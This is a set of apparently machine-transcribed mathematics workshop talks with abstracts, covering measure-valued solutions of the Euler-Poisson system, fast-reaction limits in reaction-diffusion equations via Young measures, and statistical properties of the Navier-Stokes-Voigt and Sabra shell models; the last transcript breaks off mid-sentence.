And she's going to give us a talk about the dissipative measure value solutions for the Euler-Pollson equations. Please. Thank you very much for the introduction. So the work I'm going to present today is a common work with various people. And my idea was to make an accent to put the photos of my co-authors. But then I realized that all of them concerning this work are among participants of our meeting. So instead of inserting the photos, I decided I can edit our group photo and edit a little bit to include Hase also. So thank you for adding me. So most of the of my concern today will be directed to the common work with Hose, with Tomek Dembietz and with Piotr. But I will also make some small excursions to the common works with Edward Fyreizel, with Emy Teman and with Andrzej Klem. And also I will make some connections to some works of Thanos that were influenced, also the works and discussions with Thanos influenced some of the results in this topic. So and I would also like to appreciate a lot the idea of Mira for putting my lecture as the last one, because so much has been said about measure value solutions, young measures, relative energy inequality, weak strong or measure value strong uniqueness that I'm ready with with the background. So I don't need an introduction. So I'm sorry to those who had to omit some talks before that I will skip this part. What I want to tell you that this will not be the typical way of the weak strong uniqueness result. It's slightly different. I don't know whether it's surprising or not, but different. And finally, also about Euler system with non-local terms, lots has been said mostly with alignment terms in the topic of collective dynamics. I will concentrate more on Euler Poisson system, but that's in fact an example, an analog result also can hold if we add some alignment terms. So not for presentation, this Euler Poisson will be just easier. So just the essential things about young measures for what I will put on one slide. Well, the question is whether young measures can describe concentration effect, of course in case of the systems where we don't have sufficient a priori estimates, we cannot exclude them. So that's why this concentration measures appear again and again. And just to say clearly what we mean by that. So first maybe if we have some farming of functions, then such a classical fact, fundamental year on young measures provides us existence of such a weekly measurable mapping. And with that, we can prescribe the limit of the composition of some nonlinear function and the sequence. And this we've done with such a duality per, this is duality between space of measure and C0 functions. We continue Spanish. Okay, so good. That's one thing, but on the other hand, when we have a function and we know about boundedness in L1, then we can claim with such a basic arguments like Banach and Aobro that there exists a weak star limit in the space of measures. So as the concentration measure and in what follows, I will always use the notation M with here an index to indicate from what term, what function it is coming from. This is this difference between the limit in the space of measures and in fact this biting limit. So this oscillatory part. Okay in such a remark, if we have already known that this is weekly per compact in L1, then we don't have this concentration measure. So that's, that I wanted to make sure that you remember from other talks. And important thing is that we will also need to somehow compare such a concentration measures. What is behind is of course, for the result of which strong uniqueness will need the result on relative energy inequality. So trying to show that such a inequality holds, then we need to somehow estimate appropriate terms. And once the concentration measure is present there, then also we will need somehow to compare. So important thing is that once we know the relation between functions, then the same is true for corresponding concentration measures. So that's maybe I will not, I will not really use it because I'm not going to show you an approved but that you have in mind that this is the fact that it's important. So maybe very shortly because measure value solutions were somehow appreciated more with the result first for incompressible Euler system about weak strength uniqueness or measure value strong uniqueness of Plainier-Delay's and Saquelichidis for Euler system. And this was a measure value solutions were in such a setting of diperna, Maida measures. I don't want to go into details, but anyway with the help of from the relative energy inequality we could get that measure value solutions is a direct delta function concentrated in the solution U. Okay, and after that many results of such type for different systems where appearing, maybe I would like to mention not to go into details, I will be very imprecise here to the case of system of conservation laws. So let's think about such a general system. And also some of the result appears in the paper I mentioned before, but with additional assumption, but without concentration measures. And also in one of the papers of Thanos where the concentration measure appeared in the entropy inequality. What I shortly want to mention here, there is a result here with Piot and Andrzej for the such a general hyperbolic system. And maybe let me first refer to the system of the Thanos considered also in this form. So again, I underline I'm not putting most of the assumptions, but I just want to underline the relations between the flux functions, the flux under time, the flux under the divergence and the entropy function that functions from the equations have to be controlled in this way by the entropy functions. And this Thanos did for such a general system and it was very well piloted for such an example like polyconvex elastodynamics. However, this condition is not satisfied like we look into fluid dynamics like for compressible oil equations, so worked in a similar spirit, but with only requiring the boundaries. So this is not universal result, it does not work for example for Euler Poisson system and the problem is nice here with this assumption that we don't have here in the momentum term, we don't have here the pressure term, so we will not be able to control some of the terms by the entropy network. So let me now concentrate till the end of the talk on this Euler Poisson system. So here we have such a kernel, I consider it such a Newtonian kernel. So the first thing that we want, which is very useful, that this term can be written in such a form, I would probably not discover myself, make these computations, but I know it from Thanos. So in fact what we further consider is the system not in the form of this one, but with this term having this divergence form. Okay, and the definition of measure value solutions, don't try maybe to read it in detail in particular, so not because it's not fully correct, what I discovered today shortly before the talk, but I do want to mess up and change it, because I wrote the definition for the system in this first one, and it should be in the second one. But anyway, what is crucial? Everywhere where these bars appear, so it will always be the sum of oscillatory part coming from the Young measure and this concentration part. So when speaking about the solution, we think about such a vector value Young measure and concentration measures related with the nonlinear artist that may appear. It's not important at all to remember this definition. I will tell you in a moment what is important. However, measure value solution, we also want from this, it satisfies some energy inequality. So we formulate an analog of the energy inequality, but in the measure value setting, and still always these bars are in the same meaning that I'm doing this. So measure value solution is admissible if it satisfies the following energy. So first couple of remarks, what is important to underline. The concentration measure surely may appear also in the density, which is not, we are not so used to it when we think about systems with pressure. And this is because the pressure is not here and we don't have, we have no way to provide better integrability of the pressure. And also if we look at the energy inequality, then the term here, it may also produce, we may also have concentrations produced here. Okay, so the way we proceed is let's say, usual way for when aiming for such a result. We define the relative energy, it has the following form. Again, the bars are the sums of oscillation and concentration parts. We show that such an inequality is satisfied and then we work on this remainder term. And this remainder term we want to estimate with the integral of the relative energy and then to be able to conclude with Grunwald inequality argument. Okay, good. So once, okay, once you've used this Grunwald and once you have this information that this relative energy is equal to zero, then okay, it is the last step is obvious, then you would not even write it that the Dirac measure is concentrated in the strong solution and concentration measure vanishes. So one could say so obvious that the details may be omitted and this is in fact, we were in spring visiting Hossa in London for a couple of days, making lots of estimating computations on the blackboard. So once we got this energy zero, we thought that we'd buy to Hossa and went to the airport. But here starts what is interesting in my talk that we don't have these conclusions because we had an idea that we had the airport. Let's write it down in detail and it appeared, well, no, we cannot show this. So we got the measure value strong uniqueness result, but it is different, not like the common one. So like looking at the parts of the energy inequality, so this has to be zero. So from here, we can conclude that the Yantt measure here is a tensor product of the Dirac measure concentrated in here in the strong solution gradient of phi and concentration measure vanishes. And then with that knowledge, we go to the kinetic part of the second part of the relative energy, which is here and conclude that this is from non-negative because this concentration measure is zero. But if we are away from vacuum, so we can estimate this discurrent from below, then we can say that this Yantt measure, this discurrent here is a tensor product of Dirac measure concentrated at U and some Yantt measure coming from the density. And on the vacuum, we can say, okay, from the density, zero, so here we get this Dirac delta function, but here there's still some Yantt measure because we are losing some information. So we don't come to this information of the product of appropriate Dirac measures. It's not like in case of which solutions that you could, from the equation, from the question we could pull out this information from information on phi, information on rho. You work it out later. You work it out that from Poisson equation that the strong solution is rho, but bar. Bar is this oscillatory part and concentration measure. And then you look at different terms and you are able to, using the equation, you are able to show different relations, but with bars here again. And that's why this result is different because you get the result. However, without showing that all measures, Yantt measures are Dirac measures and that all concentration measures punish. Okay, so thank you very much for your attention.
We consider pressureless compressible Euler equations driven by nonlocal repulusion-attraction and alignment forces. Our attention is directed to measure-valued solutions, i.e., very weak solutions described by a classical Young measure together with appropriate concentration defects. We investigate the evolution of a relative energy functional to compare a measure-valued solution to a regular solution emanating from the same initial datum. This leads to a weak-strong uniqueness principle.
10.14288/1.0398184 (DOI)
Okay, so thank you very, very much for introduction. And of course, I would like to thank organizers Agnieszka and Mira for inviting me here. So the title seems to be a little bit biological, but actually it has some connections with conservation laws, with measure valued solutions, with young measures. So it's not entirely biological. And it fits a little bit into the topic of the workshop. So as a warm-up, let's consider system of reaction diffusion equations. So we have two components, u and v. You have diffusion of u and diffusion of v. And you have also this reaction term. And this reaction term is scaled with epsilon. So when epsilon is very small, the reaction is very fast. And the question is, what happens with this system, solutions to this system, when epsilon goes to zero? So let me first consider the classical case that is already done and was done around 20 years ago. So when f is strictly increasing, so f prime is strictly greater than zero, then you can denote by g primitive function of f. Then you multiply the first equation by f of u epsilon, the second by v epsilon. So it's a usual thing in PDEs. And then you obtain two energy equations. So you obtain the change of energy of u and the change of energy of v. Now at this level, this is useless because here you have term one over epsilon, which is in general singular. But what you can do with these two identities, you can sum them up. So this is what I do here. And at this level, these two terms, when they are added together, they result in this term. So this term has this advantage that it is controlled. It's sign is controlled. And this energy equality is now useful for understanding what happens in the limit because you have a lot of a priori estimates. So first, because you have that time derivative of this energy is negative, you have a priori estimates in L infinity. Then if you have a priori estimates in L infinity, then you use the fact that the three terms on the right hand side have negative sign. So f of u epsilon minus v epsilon converges to zero strongly. You also have estimates for gradients of both u and v. So in particular, the sum is bounded. You also have estimates for time derivative because if you sum up these equations, you obtain that the time derivative of the sum is sum of some Laplacian, which is bounded in some negative so-called space by estimation gradients. So you can use Aubame-Lion's lemma to have that the sum converges also strongly. And if you know that the sum converges strongly, you can write the sum of u epsilon and f of u epsilon as combination of two things that you know that converge strongly. And from this, you also have that u epsilon converges strongly, v epsilon converges strongly, and you also have some relation between v and u in the limit. So that's the rather classical things to have done by Betten, Hilhorst in 2003. And now the problem that me and Benoit were working on is the question, what happens when f prime can change sign? So when this reaction function can have some regions when it is decreasing. And now you see the main problem. The main problem is here that all these a priori estimates, they are now useless. They are not, this doesn't work because if f prime changes sign, then you don't have estimates on gradient of u, and you don't have estimates on gradient of v, and you don't have even this strong convergence of f of u epsilon. So now this energy approach doesn't work. So we do not know anything of this. So I will come back to this general problem later on, but then we started to study a simpler problem. So we removed this first diffusion. So we started to consider a system when one component is allowed to diffuse, this is v, and another component cannot diffuse, it's immobile. And this is already difficult problem as you will see in a minute, but it has one advantage that you can still use energy equality to study it, because if d1 is zero, this troublemaker term, it simply vanishes. So now you have, with this, you have estimates on both gradient of v, and you have also the strong convergence of f of u epsilon to v epsilon. So this is a little bit better. And now I will start to, I will now become more precise, and I will first tell you that due to some technicalities that will appear, I consider a special function f. So I assume that it has region where, when the function is increasing, region where it is decreasing, and another region where it is increasing. This is just to focus attention. And now I will show you some numerical simulation because I, before I will state the main result. So numerical simulations are as follows. So the blue line represents the concentration of u, so this is the non-diffusing component, and the red line represents the concentration of the diffusing component. So as you see, this blue line, it looks like an oscillating sequence with a young measure that is some combination of Dirac masses. This is more or less what you would guess if you looked at this picture. So but on the other hand, you see that v behaves rather nicely. And now I will state the result. So again, we have this system. Remember that I removed this one diffusion. And we have a priori estimate from energy equality on gradient of v, and we also have energy estimate for this term. And what we'll prove is that v epsilon converges strongly to v. So strongly, I mean both in time and space. And what is very interesting about this result, what I like a lot is that, you know, the result, this is without any estimates on derivative in time. So you have compactness in space, but you have actually no compactness in time. It's very similar to, for instance, vanishing viscosity in conservation laws. And in fact, if you can multiply this second equation with time derivative of v to realize that this time derivative of v behaves more or less like one over square root of epsilon. So it's singular in general. And some other consequences of this strong convergence of v epsilon of this diffusing component. So we also have that f of u epsilon converges to v, but this is just the consequence of this a priori estimate. Because if f of u epsilon minus v epsilon over square root of epsilon is bounded, then the quantity above converges to zero. This is nothing important now. But another thing that I can have from this strong convergence of diffusing component is young measure of non-diffusing component. So let me recall briefly that what is actually young measure. So if I have a bounded function of u epsilon, then how to pass to the limit under nonlinearity? How to pass to the weak limit under nonlinearity? So you write this g of u epsilon as some artificial integral of function g against this young measure concentrated at u epsilon. And then this measure is bounded in total variation by one. So you can pass to the weak star limit, of course, taking some subsequence. And this measure we call this measure young measure. And now you can use the fact that, OK, the first observation is that since f of u epsilon converges to v epsilon and v epsilon converges strongly to v, then its young measure has to be point musted v. But on the other hand, if you denote by me the young measure of u epsilon, the young measure of f of u epsilon has to be image of the first measure under the map f. So what it follows that me has to be concentrated on the pre-image of v under the map f. And now how this results in these oscillations? Where if you recall the shape of the function f that I assumed, well, it looks like that. It has increasing region. This is this red part. It has decreasing region. This is the blue part. And again, increasing region, this is yellow part. And now if v is somewhere here between f minus and f plus, it hits three points. There are three points such that f of u is equal to v. And this is precisely this point where u is oscillating between. So what follows from strong convergence of the diffusing component is that a young measure of u epsilon is some combination of three Dirac masses, at most three Dirac masses. In numerical simulations, we see two of them. OK, so you see that all these results about this system with one diffusing component and one component which is not diffusing, it all bases about proving the strong convergence of v epsilon without information time derivative of v. That's the main thing. So the way to do that, this is more or less based on the compensated compactness approach. So we'll first obtain some family of energies and then we'll play with weak limits and obtain some identities that will be satisfied for many test functions and then we'll conclude. So how do we go? So recall the system. We have again two equations. One of them is without diffusion. Another is with diffusion. And OK, I fix some smooth function phi and I test it with phi of f of u epsilon. Another equation I test with phi of v epsilon. OK, so the result is as follows. So here nothing changes. I just multiplied. Here I also nothing changes. I just multiplied. When it comes to this term from diffusion, you just play with derivatives to write it like that. And here you have to use primitive functions because to write it again as time derivative of some function. OK, I think it's clear. And again, as with a priori estimates, these terms are still troublemakers because they are singular. But if you sum up these things, you obtain something like that. So we have time derivative. This is the red term. You have Laplacian. It is OK. Now you have these two terms. So as we know from a priori estimate, grad v is bounded. And this is also bounded because if you use some Taylor estimate, you obtain v epsilon minus f of u epsilon squared over epsilon. So this is bounded, say, in L1. OK, so what I get from this is that I have a priori estimates for these energies, namely that time derivative is bounded in some negative sub-left space. I need this h minus 1 because here is this Laplacian. So if I multiply by function h1, I will move one derivative on this test function. And this is exactly why I need h minus 1. And I also know that this is just from a priori estimates because if v epsilon is in h1, then any smooth function of v epsilon is also in h1. OK. So if I know this, I can conclude with the following compensated compactness lemma. So how it goes. I have this function here. So this is precisely a function here. And phi of v epsilon is here. So it's a rather well-known result that if you have one of functions which is compact in space, another one which is compact in time, then the product of weak limits is actually weak limit of the product. And this is more or less like something very similar to difficult lemma. OK. And from this, it's rather easy to obtain some identity on u epsilon. So here I just rewritten what was on the previous slide and how to go now. Well, we have to clean this a little bit. So as you know that v epsilon converges to the same limit as f of u epsilon, you can replace this v epsilon here. Because if test functions are smooth, then they are in particular lip sheets. So I can write it like that. So now I have everywhere u epsilon. And then this level, this is very similar to, for instance, analysis of vanishing viscosity limit for measure solution to conservation law to get that the young measure is Dirac mass. But here is a small difference. And I will point out this difference. So usually you have just some function phi of lambda. And here these functions are composed with f of lambda. So it's not just phi of u epsilon, but for instance, here you have f of u epsilon. And this f is also hidden because c prime is defined as phi of f. So you have also to deal with this f. And here comes another technical assumption on f that we somehow, we couldn't somehow do that without this. So the assumption is quite technical. I will just state it in the simplest possible way. So if you recall the plot of f, it looks like that has one increasing region, one decreasing, and another one, which is increasing. So you can define three differences of f, s1, s2, s3. And now the assumption reads that these three derivatives have to be linearly independent. So it's more or less like f has to be sufficiently curved. In particular, this doesn't hold if f is some piecewise affine functions. Because in this case, all these three inverses are just constants. OK. So I will spend the rest of my time to briefly comment, to briefly give some tribute to the Russian mathematician Plotnikov, because it's more or less his ideas that we applied to this problem. So Plotnikov studied the following equation in 90s. And so he considered forward-backward parabolic equation. So here you have time derivative, here you have Laplacian. And this f has the same monotonicity profile. So two increasing regions and one between them, which is decreasing. So you see that there is this unstable region where the equation is actually backward parabolic. And this makes troubles. And Plotnikov studied the following regularization among many, many, many authors. So he adds this time derivative here with epsilon. So you see that this is the good regularization, because if you move this term on the left-hand side, you will have something like identity minus epsilon Laplace, which is invertible as long as epsilon is greater than zero. And then you can throw it again on the right-hand side, and you will have just simple OD in some Banach spaces. So as long as epsilon is non-zero, you can solve this equation. So it's some kind of regularization. And he also get the same result that the young measure of V epsilon converges. And that the young measure of V epsilon is convex combination of young measures. Precisely each mass is located in one of these regions of f. So this is very similar result. And our problem looks very similar to this Plotnikov regularization, because if you sum up our equation, here we have something like V. OK, here is something different. But I will just tell you that it's not so much different that we could actually apply similar techniques. And OK, this paper is, I didn't find this paper in English. It's in Russian. And quite a big part of this work was to translating his paper from Russian to English. If you are interested, I have English version typed in tech, because it's quite insightful paper. OK, and brief comments on the general problem that we would like to still to understand. So two diffusing components, U and V. OK, so there are some estimates from Japanese mathematical school, which allows us to control, again, this quantity and this quantity. So it's not exactly the same. Now V epsilon, there is no chance for all these convergences that I described to you before, because we have simulations for that. But there is something again similar that if you sum up these equations, what we see in the simulations is that there is a chance for the strong convergence of this quantity. So this is precisely what we get before, because if D1 is 0, this is exactly this quantity. So this, my time. So this is the chance that this will converge strongly. But what you also see in simulations is that both U and V oscillates. So it's not like in this case that at least V epsilon does not oscillate. In this general problem, both of these quantities are oscillating. OK, and with this I would like to thank you. All right.
We analyse fast reaction limit in the reaction-diffusion system \begin{align*} \partial_t u^{\varepsilon} &= \frac{v^{\varepsilon} - F(u^{\varepsilon})}{\varepsilon}, \\ \partial_t v^{\varepsilon} &= \Delta v^{\varepsilon} + \frac{F(u^{\varepsilon}) - v^{\varepsilon}}{\varepsilon}, \end{align*} with nonmonotone reaction function $F$. As speed of reaction tends to infinity, the concentration of non-diffusing component $u^{\varepsilon}$ exhibits fast oscillations. We identify precisely its Young measure which, as a by-product, proves strong convergence of the diffusing component $v^{\varepsilon}$, a result that is not obvious from a priori estimates. Our work is based on analysis of regularization for forward-backward parabolic equations by Plotnikov [2]. We rewrite his ideas in terms of kinetic functions which clarifies the method, brings new insights, relaxes assumptions on model functions and provides a weak formulation for the evolution of the Young measure.
10.14288/1.0398463 (DOI)
I wasn't sure I haven't been doing much work in non-turning through it for a while. So I had to dig some of the old stuff which is probably I never spoke about it before, but statistical properties of Navier-Stokes Voigt model. So let's go ahead. This is the incompressible Navier-Stokes equation. Probably you have seen a lot of it. So either subject to periodic boundary condition or to Dirichlet boundary condition. And now I would like to talk about the concept of averages. One possible meaning of this notion that we see in physics literature is expectation value of a function of nice function with respect to some kind of measure in some measure space for set of smooth functions which are defined on solution on Navier-Stokes equation. We consider either invariant measures or support on the global actor or one can consider measures supported on the Navier-Stokes solution path like for particular trajectory and therefore you take a long time average or under some random perturbation or one can also consider stationary statistical solution measures notion which has been introduced by Poisson. So I will talk about all these kind of issues concerning what do we mean by average which we see all the time in turbulence theory. So the spaces of functions in the case of Dirichlet boundary condition, these are the test functions. The incompressible function was C infinity. The closure I will call it H and in the L2 and the closure in H1 I will call it V. The projection on the divergence of free functions from L2 into H, it's called the L'Helmholtz projection. So it will be noted by PL. The Navier-Stokes that I mentioned, it's the Stokes operator which is defined to be minus the L'Helmholtz projection composed with the Laplacian and the nonlinearity because there is somebody maybe needs to mute himself, it makes too much noise. There is also the Navier-Stokes projection is killing the pressure and the nonlinearity is becoming like that and therefore one can think about it as an evolution equation in the space H. The UdT equals to F where F is the forcing minus the Laplacian operator minus the nonlinearity. This is the equation of motion. So now I'm going to talk about Reynolds equation. So what Reynolds did, it took a long time average of the equation and then when you take formally the long time average and assume what and the solution are bounded so the time derivative disappears and therefore Reynolds ends up with the following equation for the average quantity like say infinite time average, assume it exists, which is the Stokes operator on the average, bilinear on the average. Navier-Stokes, so the forcing average if you are time dependent so let's say average, but now this is a nice equation, this looks like steady state Navier-Stokes. However, because of the linearity and we know that the average of product is not product of the averages, there is some kind of leftover and that's what we teach our students. There is this term which is basically the fluctuation interaction with the fluctuation average, the div of that and this term is called the Reynolds stress tensor and u prime is the fluctuation is u minus the average. So in other words, the equation of the average is not closed. I don't have the equation for closed. So in order to basically find the equation of motion for you, I need to know something about the average of the fluctuation interaction which is a second order moment in order to understand the average. And if you try to see the second order moment evolution, you will end up needing third order and therefore there's a hierarchy and this is never stops and this is called the closure problem in turbulence that we cannot have a closed system of equation. Nonetheless, this is the equation that people are interested in and all turbulence model is basically about how to model this term, the Reynolds average stresses in terms of u bar and this is based on empirical data or some kind of indicated guess and so on and so forth. So all what people in turbulence modeling doing is really trying to replace there this in terms of the average of you to get a closed model to get what's happening to this turbulence in the average. So turbulence theory is about statistics and all the models about what's going to happen to average quantities. It's not about individual solutions. So now what's the Navier-Stokes Void model? Using the Kelvin Void doing some expansions because of all kinds of like this elastic effect and doing some expansions with delays and formally one gets the following equation which is like the Navier-Stokes equation but you have this extra term which is alpha square Laplacian by the time derivative of this term. This is coming from the stress tensors if you do some kind of like this is some Kelvin Void kind of like approximation model. Some people in viscoelasticity claim this has nothing to do with viscoelasticity to the point that they basically do not even to consider it as part of viscoelasticity community. I am not going to put the hat of viscoelasticity except that this is supposed to be a non-tunnel fluid workshop. That's why I'm talking about it in that context but I would like to consider it in a different way. What do I mean? So this is the equation of motion and I put here alpha to stress that this is this alpha term here in addition to the Navier-Stokes. So this is Navier-Stokes equation plus this particular term. Now let me stress something very important. First of all I mean I will mention something. This equation or this model has a global regularity even in three dimensions. So this is not adding hyperviscose for the Navier-Stokes. This is just adding this time derivative of the Laplacian. In some sense this is changing the energy in the Navier-Stokes equation when you multiply by u and integrate. Instead of being the L2 norm we will become the L2 norm plus the alpha squared gradient norm. In other words what is conserved or whatever is dissipated by the viscosity is the H1 norm and we know the H1 norm is the quantity that we need to control in Navier-Stokes to get global existence. So therefore this term does not really add a dissipation or regularize the solutions. It basically changes the structure of the equation that now you have a different conservation law or conserved quantities and therefore when alpha formally equals to zero I get Navier-Stokes and I would like to think about this as a numerical regularization of Navier-Stokes when alpha is very small different than the hyperviscose regularization that people like to put because hyperviscose regularization kills the energy very quickly especially at the larger scales and there is an additional problem in numerical analysis point of view. In Navier-Stokes usually I give you the boundary condition say u equals to zero at the boundary. If you add hyperviscose to like Laplacian square then I need additional boundary condition which means I will need to artificially introduce a new boundary condition there which means I will affect the boundary layers and we know that in turbulence most turbine flows are driven by boundary so doing something with the boundary condition is a little bit ad hoc and needs interpretation or need explanation. Now this term here which is the time derivative of the Laplacian it means because I have Laplacian of the term derivative I need boundary condition on the time derivative but I don't need to create boundary condition for the time derivative because if u is given at the boundary to be zero the u sub t at the boundary equal to zero so I don't need to do anything ad hoc to satisfy the boundary condition for this ad hoc or basically a numerical regularization. So this is the model that I would like to think about it as an approximation for the Navier-Stokes equation. So this model we invented it when coming from the alpha models of turbulence but later when we dig in the literature we realized that it was part of the thesis of Skolkoff was student of Ladzhensky in 1973. We managed to prove all these issues about finite dimensional attractor and we have to prove a group of a global well-possessiveness even without viscosity so what's interesting about this model here is that even without viscosity like the Euler when you regularize the Euler you have a global existence but we have to be careful because Euler the boundary condition is not about you it's about only the normal components so in periodic boundary condition this is good regularization for Euler so there even in the Euler case we can show global existence of this model I will I don't have much time to talk about that. What's interesting here is that if I look at this operator identity minus alpha square Laplacian and I invert it multiply I get Laplacian with inverse of Laplacian so the viscosity is now no longer viscosity it's a damping term in other words this equation is no longer parabolic even if you forget about the linearity this equation is no longer parabolic it is like an evolution equation like an ODE and hence I don't expect smoothness property of the solution as in Navier-Stokes as in parabolic equation so nonetheless we have in some sense sort of like damping term due to the viscosity interacting with this regularization and because you don't have the smoothing if I start with initial data in H1 I remain indefinitely in H1 there is no smoothing effect but because of the damping we can show that if the force is analytic or in Givray class then the solutions on the attractor are in Givray class in other words the roughness in the initial data will eventually be damped by the damping term and disappears completely when time goes to infinity and hence the attractors or the element of the attractors are very nice why this is important because in turbulence theory when you write the energy spectrum of the solution there is a scale it's called the Kormogorov scale below that scale we know that the energy is exponentially small which means that the Fourier modes must be exponentially decaying after settling scale which is intimately related to the issue of analyticity of the solution namely as I mentioned here some Givray regularity so try to connect all these with the theory of turbulence so what's also observed about this equation which is puzzling if I take the Reynolds average, namely take the infinite tan average the tan derivative disappears and I remain with averages of the Navier-Stokes like term because I have here only tan derivative hence the Reynolds equation for this model is exactly the Reynolds equation of the Navier-Stokes this is what's basically forced us to look into the statistical properties of what's happening with this equation namely that the long-term average of the solutions offer the Navier-Stokes and the infinite tan average of the Navier-Stokes Voigt model obey the same equation so the dynamics maybe is different but when you go into the long-term statistics you give the same equation of course nobody said that the solution of this equation is unique but what people observe in averages they observe some unique structure and now the question is can we say aha even though the dynamics is different and the Navier-Stokes Voigt has a global existence but the long-term behavior or long-term averages or Reynolds equations are the same can we say something about the statistics of the Navier-Stokes Voigt is an approximation for the statistics of Navier-Stokes that's basically where we raise this question and trying to understand what is going in this way now as I said the Navier-Stokes equation if you write it in Fourier modes and for Fourier mode the wave number number k this is the equation of motion and there this is the nonlinearity we wrote it like explicitly here this is the viscosity this is the pressure and this is the forcing and this is into pressurizability condition so this is writing it as an infinite system of ordinary differential equations now inspired by that mathematical physicist wrote a simple model instead of having this infinite sum in the convolution like um and ul summation over all the m and all the the else equals to k they basically truncated and took that m and l around the wave number k so they took m up to k minus one or k plus one and the same with l so they killed instead of like infinite convolution they make it basically like very localized in the Fourier space interaction and wrote a model which is called the shell model as if an unlogical model and they said it is maybe easier to investigate numerically and see what happens in this particular thing so this is a particular model that I would like to to mention here or to talk about okay and this model is called the sabrachel model which is has similar structure as the navier stocks and here's the nonlinearity you see that basically k and only n plus one n is now the index this is also part of the linearity k n is like the derivative one derivative k square is like the Laplacian and this is the linearity and they inserted some parameter here in this equation and now what happens is the following if you look into this model which is phenomenological they realize that it has two quantities which are conserved the first one is the sum of the Fourier equivalent of Fourier square which is like the energy and they discovered that there is another quantity quadratic quantity which is summation one minus epsilon minus one to the power and you and so notice that epsilon is a number which is which is a parameter that they have and now you have two options either epsilon bigger than one and therefore you have something which is algebraically with weight in power of n multiplied by the Fourier square but it is positive and this is like the n-strophy in 2D navier stocks and Euler namely the L2 norm of the vorticity which is invariant and if epsilon is less than one this is not definite inside in fact it's alternating and there is another quantity in Euler and navier stock which is which is formally conserved which is called the helicity and therefore what's nice about this model is in one parameter you can move by changing the epsilon from 2D to 3D structurally not really as far as dimension and so on and so on and so forth now why am I mentioning that because I would like to test some of our numerics onto this model so what people did the spectrum of the shell model they realized that it behaving like almost k to the minus one-third which is similar to the one expected in turbulence for navier stocks which gives people assurance from diagram of situation that at least this model in the three-dimensional regime maybe when epsilon bigger than one it has some of the nice structure functions like the navier stocks and therefore can we really push and conclude more issues about this equation now even we can see some intermittency by intermittency is basically the ratio of the mean rate of dissipation of energy fluctuation divided the mean rate of dissipation of energy so this is like what causes this kind of like burst in the flow that you see in the Lagrangian that once in a file you see like kind of like eruption and eruption these are basically the spikes which is the intermittency they see it also in the shell model and it is large like order this is epsilon prime over epsilon up to 200 you know in time now we studied this sabra model together with peter constantine and my former student Boris Levant and we proved all kind of like nice properties the global existence uniqueness the apparent attractor even inertial manifold and even in the inviscid case we can show a global existence of weak solutions in 3d but we cannot prove uniqueness and of course now one can probably try to see if one can use the convex integration machinery and introduce it to this phenomenological model I am not very certain but nonetheless there is none uniqueness and the reason we wanted to study in this case because we wanted to prove the dissipation normally conjecture but that's a different story so now inspired by the Navier-Stokes Voigt one can go to the sabra model and introduce something similar and indeed this is the similar thing on the time derivative I put alpha square Laplacian so it's alpha square KN square and now this is the analog of Navier-Stokes Voigt sabra shell model why I want to introduce that not to investigate it analytically because I investigated the original one but I would like to do numerical simulation and to see what kind of features I see and do do they persist for Navier-Stokes or and or not so to go a little bit quicker this is some of the simulation for alpha 10 to the minus 6 and discuss it 10 to the minus 9 you see like the energy spectrum but we start realizing that alpha which is 10 to the minus 9 which is relatively not small enough and by small enough in comparison to the Kolmogorov-Link scale we start seeing that the inertial range here has some flat part in some sense that what inhibits the cascade of energy to a smaller scale and then boom after what you have the viscosity if now we take alpha smaller like between minus so here's like different values you see that the smallest value it is almost like like Navier-Stokes this flat part here it starts basically steepening and steepening to become like the Navier-Stokes in particular when alpha is a small smaller than Kolmogorov then we see exactly the same energy spectrum like the Navier-Stokes equation so this is an indication that maybe the statistics of Navier-Stokes Voight is mimicking the statistics of Navier-Stokes when alpha is very small because my time is almost over so we can so also that this model suppresses intermittency this is what what we had in the Navier-Stokes you see you get up to 200 in this intermittency these eruptions are very strong but then when alpha tends to the minus seven maximum you get here into about less than 120 in the intermittency for the same initial data and if you take even alpha larger you even almost suppress it completely less than 100 so in some sense this is regularizing the eruption of small scales which is exactly consistent with the fact that you have a global existence so now what happens when the limit alpha goes to zero do the statistics converge as I said we have indication in the numerics we have theorems I will go into the theorems about invariant measures for Navier-Stokes and for the Voight model without getting to details that's not really important but I would like just to mention a theorem that we have is the theorem that we have together with Fabio Ramos was my postdoc it's an old result giving a sequence of invariant measures for the three-dimensional Voight which we can establish they exist then there exists a subsequence alpha in goes to zero which is denoted by mu alpha n such that it has a limit which is a Borel measure in H1 and this Borel measure because you have conversions weekly in that sense and this Borel measure is a strong statistically stationary solutions of the 3D Navier-Stokes equation namely it's an invariant measures for the Navier-Stokes with statistical stationary solution so therefore averages with respect to these measures of quantities phi of u of some moments etc etc is good approximation for averages for Navier-Stokes which is exactly the theorem that we would like to talk about and in particular we have something about the energy I don't have much time to talk about it so I will I will stop here and thank you very much thank you at least thank you for the nice talk is there any question or comment please unmute yourself maybe I will just ask yeah please go ahead yeah at least there are also like models which are called second grade is this similar no it is different no no it is the I see I know what you're saying you see as I said at the very beginning I start working with the Kamasa Holm or Navier-Stokes alpha and we start changing the models motivated by comparison with experimental flows because we look to the steady state of those models and compare to the steady state and we realize then we then we derived what we called Le Ray alpha by the way there is a model called Le Ray alpha and everybody when they cited they give the site the paper of Le Ray Le Ray has nothing to do with Le Ray alpha yes okay so we regularize the equation in specific way and then we realize that this is one of the kernels that Le Ray would have used but this has nothing to do it has extra properties and and so forth so what happens is that slowly we reached into this model and say voila we got a nice model which is regularizing the equations it's different than the model which is the second grade fluid because the nonlinearity here is a smoother it's u dot nabla u it's not u dot nabla v where v is exactly u minus Laplacian u so it is a more regular than that model okay it's more regular than that model and this model without viscosity has a global existence the other one does not have this property and and yeah so it is it is different in that sense and yeah but but so so the difference is the nonlinearity here is u dot nabla u in their models the name is u dot nabla v and we realize that I don't need this nabla v extra and which is allows you even in theexisting
